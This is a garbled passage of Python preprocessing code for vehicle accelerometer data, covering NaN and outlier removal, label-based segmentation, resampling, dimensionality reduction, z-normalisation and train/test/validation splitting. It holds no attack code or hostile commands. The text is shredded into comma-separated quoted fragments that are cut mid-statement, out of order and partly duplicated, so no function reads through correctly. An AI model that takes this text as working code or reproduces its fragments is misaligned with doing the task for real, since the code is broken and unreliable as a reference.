Hz #Test for ind in range(len(data_test_segments)): data_test_segments[ind]", "segments_combined.index.astype('datetime64[1s]')) segments_aggregated.append(segments_combined) return segments_aggregated except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc())", "= meta_data['mean_train'] std_train = meta_data['std_train'] print('Convert time unit, remove nans') data = self.convert_unix_to_datetime(data,", "data=data_train_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Test", "too short after splitting min_length_subsegements = [] for segment in segments: if segment.shape[0]", "= None, threshold = None): \"\"\" Removes outlieres either based on quantile or", "mode == 'orientation': if len(target_columns)+1 != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) # Source for theory", "representation of a data set. :param current_representation: :param target_representation: :param data: :return: \"\"\"", "for segment in min_length_subsegements: segment = segment.reset_index() segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) segment = self.resample_quantitative_data(segment,", "that are too long or too short after splitting min_length_subsegements = [] for", "labels, data): \"\"\" Combines labels vector and data matrix. :param labels: :param data:", "quantile or a threshold value. :param data: :param replacement_mode: :param columns: :param quantile:", "self.remove_nans(data, replacement_mode='del_row') print('Train, Test, Validation split') data_len = data.shape[0] test_len = int(data_len *", "TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if mean is None and std is None: if columns is not", "= (data - data.min()) / (data.max() - data.min()) # to center around 0.0", ":param quantile: :param threshold: :return: \"\"\" try: if data is None or replacement_mode", "label value data_segments = [] for target_label in args: selected_data = data[data[label_column] ==", "drop=True, inplace=True) print('Resample') data = self.resample_quantitative_data(data, freq=freq) # 8000 1.25 Hz print('Dimensionality reduction')", "win_type='gaussian').sum(std=3) #data_train = self.remove_nans(data_train, replacement_mode='del_row') #data_test = self.remove_nans(data_test, replacement_mode='del_row') #data_valid = self.remove_nans(data_valid, replacement_mode='del_row')", "data = None for ind in range(len(data_segments)): if data is None: data =", "not isinstance(unwanted_labels, list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'del_row':", "mode == 'gravity': if len(target_columns) != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) for ind, column in", "# Source for next 3 lines after comment: # https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index non_sequence = pandas.Series(selected_data.index).diff()", "self.resample_quantitative_data(data_valid_segments[ind], freq=freq) print('Dimensionality reduction') #Train for ind in range(len(data_train_segments)): data_train_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_train_segments[ind],", "print('Dimensionality reduction') #Train for ind in range(len(data_train_segments)): data_train_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_train_segments[ind], mode=config['feature_eng_dim_reduction_type'], #", "(data[columns] - mean) / std else: data = (data - mean) / std", "used as value if replacment_mode is 'default_val' :return: pandas.DataFrame \"\"\" try: if data", "= (data - mean) / std else: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) return data, mean, std", "is None or column is None or unit is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if", ")[:-2] #Valid data_valid = self.de_segment_data(data_valid_segments, selected_columns) data_valid, mean_valid, std_valid = self.znormalize_quantitative_data(data_valid, selected_columns[:-2], mean_train,", ":param replacement_mode: :param columns: :param quantile: :param threshold: :return: \"\"\" try: if data", "segments_aggregated.append(segments_combined) return segments_aggregated except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2)", "https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html # https://en.wikipedia.org/wiki/Principal_component_analysis pca = PCA(n_components=1) pca.fit(data[columns]) reduced =", "if mode == 'custom_function': if encoding_function is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) for column in", "min_length_subsegements: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return min_length_subsegements #3. Resample and aggregate data segments_combined =", "int(data_len * valid_sz) data_train, data_test_valid = data.head(train_len), data.tail(test_len+valid_len) data_test = data_test_valid.head(test_len) data_valid =", "for road_segment in road_segments: data_valid_segments.append(road_segment) print('Resample') #Train for ind in range(len(data_train_segments)): data_train_segments[ind] =", "any type, used as value if replacment_mode is 'default_val' :return: pandas.DataFrame \"\"\" try:", "args=None): \"\"\" Project accelerometer data from local vehicle coordinates to a global coordinate", "columns: :param encoding_function: :return: \"\"\" try: if data is None or mode is", "data = self.reduce_quantitativ_data_dimensionality( data=data, mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns,", "is None or labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not (isinstance(data, pandas.DataFrame) and", "\"\"\" Resamples quantitative data. :param data: :param freq: :param mode: :return: \"\"\" #", "data_test, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical approach via TS", "== 'del_row': return DelRowReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'replacement_val': return ReplacementValReplacementStrategy().replace(data, 'NaN', replacement_vals=replacement_value)", ": numpy.array_split(df, len(df) // chunk_size + 1, axis=0) # 1. Ensure index is", "(data.max() - data.min()) # to center around 0.0 substract 0.5 return data except", "or not isinstance(mode, str) or not isinstance( columns, list): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode", "'id'] # 'acceleration_abs' data_train = self.de_segment_data(data_train_segments, selected_columns) data_train, mean_train, std_train = self.znormalize_quantitative_data(data_train, selected_columns[:-2])", "if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance( columns, list):", "euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') selected_columns = ['acceleration_abs'] data,", "(TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def inference_split_process(self, data,", "if data is None or column is None or unit is None: raise", "except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_nans(self, data, replacement_mode, replacement_value=None): \"\"\" Remove NaNs", "https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index non_sequence = pandas.Series(selected_data.index).diff() != 1 grouper = non_sequence.cumsum().values selected_data_segments = [group for", "not None: mean = data[columns].mean() std = data[columns].std() data[columns] = (data[columns] - data[columns].mean())", "= [] for segment in segments: if segment.shape[0] == segment_length: min_length_subsegements.append(segment) if not", "try: if data is None or replacement_mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not", "elif mean is not None and std is not None: if columns is", "labels) data = self.remove_nans(data, replacement_mode='del_row') print('Train, Test, Validation split') data_len = data.shape[0] test_len", "pandas.DataFrame) or not isinstance(mode, str) or not isinstance(reduced_column_name, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode", "# current run @0.95 for classical approach via TS Fresh )[:-2] #Valid data_valid", "min_periods=1, win_type='gaussian').sum(std=3) #data_valid['acceleration_abs'] = data_valid['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_train = self.remove_nans(data_train, replacement_mode='del_row') #data_test =", "args[1] exact_length = args[2] segments_aggregated = [] split = lambda df, chunk_size :", "\"\"\" Combines labels vector and data matrix. :param labels: :param data: :return: \"\"\"", "all data with desired label value data_segments = [] for target_label in args:", "def __init__(self): super().__init__() @overrides def segment_data(self, data, mode, label_column=None, args=None): \"\"\" Segements a", "https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html reduced = data[columns].apply(numpy.square, axis=1)[columns].sum(axis=1).apply(numpy.sqrt) #**(1/2) alternative old_index = data.index data", "to center around 0.0 substract 0.5 return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc())", "replacement_mode == 'threshold': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1)", "or column is None or unit is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data,", "\"\"\" Apply min-max-normalization to a data set. :param data: :param columns: :return: \"\"\"", "not isinstance(columns, list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if len(columns) < 1:", "self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_nans(self, data, replacement_mode, replacement_value=None): \"\"\"", "data is None or replacement_mode is None or unwanted_labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "None): \"\"\" Apply a dimensionality reduction technique to a data set. :param data:", "not None and std is not None: if columns is not None: data[columns]", "data from local vehicle coordinates to a global coordinate system. :param data: :param", "self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def convert_unix_to_datetime(self, data, column, unit): \"\"\"", "replacement_mode, replacement_value=None): \"\"\" Remove NaNs :param data: :param replacement_mode: string, 'mean', 'replacement_val', 'delet_row'", "* (data[args[ind]] / data[args[3]]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc())", "data_test_valid = data.head(train_len), data.tail(test_len+valid_len) data_test = data_test_valid.head(test_len) data_valid = data_test_valid.tail(valid_len) print('Segment by labels')", "aggregate = args[1] exact_length = args[2] segments_aggregated = [] split = lambda df,", "= self.label_data(data, labels) data = self.remove_nans(data, replacement_mode='del_row') print('Train, Test, Validation split') data_len =", "test_sz) train_len = int(data_len * train_sz) valid_len = int(data_len * valid_sz) data_train, data_test_valid", "= data_test_valid.head(test_len) data_valid = data_test_valid.tail(valid_len) print('Segment by labels') #Segment Train car_train_segments = self.segment_data(data_train,", "if replacement_mode == 'replacement_val': return ReplacementValReplacementStrategy().replace(data, 'NaN', replacement_vals=replacement_value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError,", "or not isinstance(mode, str) or not isinstance(target_columns, list): raise TypeError(type(data)) if mode ==", "unit = 'ms') data = self.label_data(data, labels) data = self.remove_nans(data, replacement_mode='del_row') print('Train, Test,", "data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2)", "= data.set_index(old_index) return data if mode == 'pca': # Source: # https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe #", "encoding_function): \"\"\" Encode categorical features using an encoding function. :param data: :param mode:", "segments: if segment.shape[0] == segment_length: min_length_subsegements.append(segment) if not aggregate: for segment in min_length_subsegements:", "quantile: :param threshold: :return: \"\"\" try: if data is None or replacement_mode is", "data_valid = data_valid.loc[:, ~data_valid.columns.duplicated()] #print('Rolling mean smoothing') #data_train['acceleration_abs'] = data_train['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #TODO", "None for segment in min_length_subsegements: segment = segment.reset_index() segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) segment =", ":param args: :return: \"\"\" try: if data is None or mode is None:", "mode == 'euclidean': # Source: # https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/ # https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8 # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html", "meta_data['std_train'] print('Convert time unit, remove nans') data = self.convert_unix_to_datetime(data, column='time', unit='ms') data =", "#data_test = self.remove_nans(data_test, replacement_mode='del_row') #data_valid = self.remove_nans(data_valid, replacement_mode='del_row') #print(data_train.head(100)) return data_train, mean_train, std_train,", "try: if data is None or target_columns is None or mode is None:", "series. :param data_segments: :param selected_columns: :param axis: :return: \"\"\" try: data = None", "data = pandas.concat([data, reduced], axis=1) data = data.set_index(old_index) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except", "return data if mode == 'manhatten': reduced = data[columns].sum(axis=1).apply(numpy.abs, axis=1) old_index = data.index", "args=selected_coarse_labels) data_valid_segments = [] for car_segment in car_valid_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label',", "mean_train = meta_data['mean_train'] std_train = meta_data['std_train'] print('Convert time unit, remove nans') data =", "= config['pre_proc_resample_freq'] # '1000ms' mean_train = meta_data['mean_train'] std_train = meta_data['std_train'] print('Convert time unit,", "config, meta_data): \"\"\" Apply all preprocessing steps necessary for inference. :param data: pandas.DataFrame", "if data is None or target_columns is None or mode is None: raise", "data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min()) # to center around 0.0 substract 0.5 else: data = (data -", ":param mode: :param reduced_column_name: :param columns: :return: \"\"\" try: if data is None", "data_test = data_test_valid.head(test_len) data_valid = data_test_valid.tail(valid_len) print('Segment by labels') #Segment Train car_train_segments =", "= data.reset_index(drop=True) data = data.set_index(old_index) return data if mode == 'manhatten': reduced =", "data_test = self.remove_outliers_from_quantitative_data( data_test, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical", ":param columns: :return: \"\"\" try: if data is None or mode is None", "ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_outliers_from_quantitative_data(self, data, replacement_mode, columns,", "reduced = data[columns].sum(axis=1).apply(numpy.abs, axis=1) old_index = data.index data = pandas.concat([data, reduced], axis=1) data", "self.remove_outliers_from_quantitative_data( data_valid, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical approach via", "self.segment_data(data_test, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_test_segments = [] for car_segment in car_test_segments: road_segments =", "= self.znormalize_quantitative_data(data_test, selected_columns[:-2], mean_train, std_train) data_test = self.remove_outliers_from_quantitative_data( data_test, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 #", "= args[2] segments_aggregated = [] split = lambda df, chunk_size : numpy.array_split(df, len(df)", "Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def label_data(self, labels, data): \"\"\" Combines labels vector and", "column in columns: data[column] = encoding_function(data[column]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError,", "data[column].quantile(quantile) ) data[column] = data[column][not_outliers] index_names = data[~not_outliers].index data.drop(index_names, inplace=True) old_index = data.index", "in car_valid_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments:", "mode = None): \"\"\" Resamples quantitative data. :param data: :param freq: :param mode:", "data_test_segments[ind].set_index('time') data_test_segments[ind] = self.resample_quantitative_data(data_test_segments[ind], freq=freq) #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] = data_valid_segments[ind].set_index('time')", "isinstance(column, str) or not isinstance(unit, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) data[column] = pandas.to_datetime(data[column], unit=unit) return", "Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def encode_categorical_features(self, data, mode, columns, encoding_function): \"\"\" Encode categorical", "data_valid_segments[ind].set_index('time') data_valid_segments[ind] = self.resample_quantitative_data(data_valid_segments[ind], freq=freq) print('Dimensionality reduction') #Train for ind in range(len(data_train_segments)): data_train_segments[ind]", "!= len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) for ind, column in enumerate(target_columns): data[column] = data[column] -", "# Source for theory behind below calculation # https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation # https://en.wikipedia.org/wiki/Homogeneous_coordinates # #https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it", "# https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html # https://en.wikipedia.org/wiki/Principal_component_analysis pca = PCA(n_components=1) pca.fit(data[columns]) reduced", "works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') selected_columns", "comment: # https://nextjournal.com/schmudde/how-to-remove-outliers-in-data for column in columns: not_outliers = data[column].between( data[column].quantile(1.0 - quantile),", "self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_unwanted_labels(self, data, unwanted_labels, replacement_mode): \"\"\" Remove rows that have", "'del_row': return DelRowReplacementStrategy().replace(data, 'unwanted_labels', unwanted_labels) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1)", "\"\"\" try: if data is None or mode is None or reduced_column_name is", "data: pandas.DataFrame :param params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') #print(params)", "'sum': return data.resample(freq).sum() except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2)", "== 'mean_estimate_gravity': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gyroscope': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode ==", "data.keys() for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if columns is not None: data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min())", "= [] split = lambda df, chunk_size : numpy.array_split(df, len(df) // chunk_size +", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(column, str) or not isinstance(unit,", "non_sequence = pandas.Series(selected_data.index).diff() != 1 grouper = non_sequence.cumsum().values selected_data_segments = [group for _,", "std is not None: if columns is not None: data[columns] = (data[columns] -", "len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) # Source for theory behind below calculation # https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation #", "(TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_nans(self, data,", "center around 0.0 substract 0.5 else: data = (data - data.min()) / (data.max()", "exact_length: for segment in segments: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return segments #3. Remove segments", "for next 7 lines of code after comment: # https://nextjournal.com/schmudde/how-to-remove-outliers-in-data for column in", "in min_length_subsegements: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return min_length_subsegements #3. Resample and aggregate data segments_combined", ":param data: :return: \"\"\" raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) @overrides def reduce_quantitativ_data_dimensionality(self, data, mode, reduced_column_name =", "try: if data is None or replacement_mode is None or unwanted_labels is None:", "self.reduce_quantitativ_data_dimensionality( data=data, mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' )", "except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def inference_split_process(self,", "self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_outliers_from_quantitative_data(self, data, replacement_mode, columns, quantile = None, threshold =", "None or replacement_mode is None or unwanted_labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not", "segment.shape[0] == segment_length: min_length_subsegements.append(segment) if not aggregate: for segment in min_length_subsegements: segment.index =", "local vehicle coordinates to a global coordinate system. :param data: :param target_columns: :param", "- data.mean()) / data.std() elif mean is not None and std is not", "Resample and aggregate data segments_combined = None for segment in min_length_subsegements: segment =", "https://nextjournal.com/schmudde/how-to-remove-outliers-in-data for column in columns: not_outliers = data[column].between( data[column].quantile(1.0 - quantile), data[column].quantile(quantile) )", "is None: return data.resample(freq).mean() if mode == 'sum': return data.resample(freq).sum() except (TypeError, NotImplementedError,", "or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(mode,", "for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if mean is None and std is", "is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode ==", "= self.de_segment_data(data_test_segments, selected_columns) data_test, mean_test, std_test = self.znormalize_quantitative_data(data_test, selected_columns[:-2], mean_train, std_train) data_test =", "def remove_nans(self, data, replacement_mode, replacement_value=None): \"\"\" Remove NaNs :param data: :param replacement_mode: string,", "pandas.DatetimeIndex( segments_combined.index.astype('datetime64[1s]')) segments_aggregated.append(segments_combined) return segments_aggregated except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception:", "encoding function. :param data: :param mode: :param columns: :param encoding_function: :return: \"\"\" try:", "in selected_data.groupby(grouper)] for segment in selected_data_segments: data_segments.append(segment) return data_segments if mode == 'fixed_interval':", "def project_accelerometer_to_global_coordinates(self, data, target_columns, mode, args=None): \"\"\" Project accelerometer data from local vehicle", "reduced_column_name: :param columns: :return: \"\"\" try: if data is None or mode is", "columns: not_outliers = data[column].between( data[column].quantile(1.0 - quantile), data[column].quantile(quantile) ) data[column] = data[column][not_outliers] index_names", "by labels') #Segment Train car_train_segments = self.segment_data(data_train, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_train_segments = []", "3 lines after comment: # https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index non_sequence = pandas.Series(selected_data.index).diff() != 1 grouper =", "= self.remove_nans(data_test, replacement_mode='del_row') #data_valid = self.remove_nans(data_valid, replacement_mode='del_row') #print(data_train.head(100)) return data_train, mean_train, std_train, data_test,", "segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) segment = self.resample_quantitative_data(segment, freq=\"{}s\".format(segment_length), mode = 'mean') if segments_combined is", "self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_nans(self, data, replacement_mode, replacement_value=None): \"\"\" Remove NaNs :param data:", "if columns is not None: data[columns] = (data[columns] - mean) / std else:", "if mode == 'mean' or mode is None: return data.resample(freq).mean() if mode ==", "# works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Test for ind", "for column in columns: not_outliers = data[column].between( data[column].quantile(1.0 - quantile), data[column].quantile(quantile) ) data[column]", "vehicle coordinates to a global coordinate system. :param data: :param target_columns: :param mode:", ":param mode: :return: \"\"\" # Source: # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html # https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html try: if data", "columns: :return: \"\"\" try: if data is None or mode is None or", "self.remove_outliers_from_quantitative_data( data_test, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical approach via", "ind in range(len(data_test_segments)): data_test_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_test_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean", "segments_aggregated except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def", "= config['pre_proc_movement_type_label'] #[5] selected_road_labels = config['pre_proc_road_type_label'] #[1, 3] freq = config['pre_proc_resample_freq'] #'1000ms' print('Convert", "data[columns].T).T)) reduced = reduced.rename(columns={0:reduced_column_name}) reduced = reduced.reset_index(drop=True) old_index = data.index data = data.reset_index(drop=True)", "isinstance(data, pandas.DataFrame) or not isinstance(column, str) or not isinstance(unit, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) data[column]", "def convert_unix_to_datetime(self, data, column, unit): \"\"\" Converts unix time stamps to date time.", "= config['pre_proc_validation_sz'] #acelerometer_columns = ['acceleration_x', 'acceleration_y', 'acceleration_z'] acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] selected_coarse_labels", "data[args[3]]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception:", "mean = data.mean() std = data.std() data = (data - data.mean()) / data.std()", "data, columns=None): \"\"\" Apply min-max-normalization to a data set. :param data: :param columns:", "data is None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame):", "# current run @0.95 for classical approach via TS Fresh )[:-2] data_train =", "pandas.DataFrame) or not isinstance(unwanted_labels, list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode", "os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_nans(self, data, replacement_mode, replacement_value=None): \"\"\" Remove", "Apply all preprocessing steps necessary for training. :param data: pandas.DataFrame :param params: List", "in car_train_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments:", "motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Test for ind in range(len(data_test_segments)): data_test_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_test_segments[ind],", "current run @0.95 for classical approach via TS Fresh )[:-2] #Test data_test =", "self.logger.error(traceback.format_exc()) os._exit(2) @overrides def min_max_normalize_quantitative_data(self, data, columns=None): \"\"\" Apply min-max-normalization to a data", "os._exit(2) @overrides def remove_nans(self, data, replacement_mode, replacement_value=None): \"\"\" Remove NaNs :param data: :param", ":param reduced_column_name: :param columns: :return: \"\"\" try: if data is None or mode", "replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'unwanted_labels', unwanted_labels) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError):", "'quantile': # Source for next 7 lines of code after comment: # https://nextjournal.com/schmudde/how-to-remove-outliers-in-data", "for ind in range(len(data_train_segments)): data_train_segments[ind] = data_train_segments[ind].set_index('time') data_train_segments[ind] = self.resample_quantitative_data(data_train_segments[ind], freq=freq) # 8000", "TS Fresh )[:-2] #Test data_test = self.de_segment_data(data_test_segments, selected_columns) data_test, mean_test, std_test = self.znormalize_quantitative_data(data_test,", "std_train) data = self.remove_outliers_from_quantitative_data( data, replacement_mode='quantile', columns=selected_columns, quantile=0.99 # current run @0.95 for", "= [group for _, group in selected_data.groupby(grouper)] for segment in selected_data_segments: data_segments.append(segment) return", "0): \"\"\" Desegements as time series. :param data_segments: :param selected_columns: :param axis: :return:", "mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_valid_segments = [] for car_segment in car_valid_segments: road_segments = self.segment_data(car_segment,", "data if replacement_mode == 'threshold': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError):", "except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def min_max_normalize_quantitative_data(self, data, columns=None): \"\"\" Apply min-max-normalization to", "Encode categorical features using an encoding function. :param data: :param mode: :param columns:", "is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(column, str) or", "data is None: data = data_segments[ind][selected_columns] else: data = pandas.concat([data, data_segments[ind][selected_columns]], axis=axis) data", ":param data: :param replacement_mode: string, 'mean', 'replacement_val', 'delet_row' :param replacement_value: any type, used", "Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def min_max_normalize_quantitative_data(self, data, columns=None): \"\"\" Apply min-max-normalization to a", "threshold value. :param data: :param replacement_mode: :param columns: :param quantile: :param threshold: :return:", "znormalize_quantitative_data(self, data, columns = None, mean = None, std = None): \"\"\" Apply", "for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Test for ind in range(len(data_test_segments)): data_test_segments[ind] = self.reduce_quantitativ_data_dimensionality(", "reduced_column_name}) data = data.reset_index(drop=True) data = data.set_index(old_index) return data if mode == 'manhatten':", "numpy.array_split(df, len(df) // chunk_size + 1, axis=0) # 1. Ensure index is datetime", "\"\"\" Converts unix time stamps to date time. :param data: :param column: :param", "= 'reduced', columns = None): \"\"\" Apply a dimensionality reduction technique to a", "# https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html reduced = data[columns].apply(numpy.square, axis=1)[columns].sum(axis=1).apply(numpy.sqrt) #**(1/2) alternative old_index = data.index data =", "data[columns].mean() std = 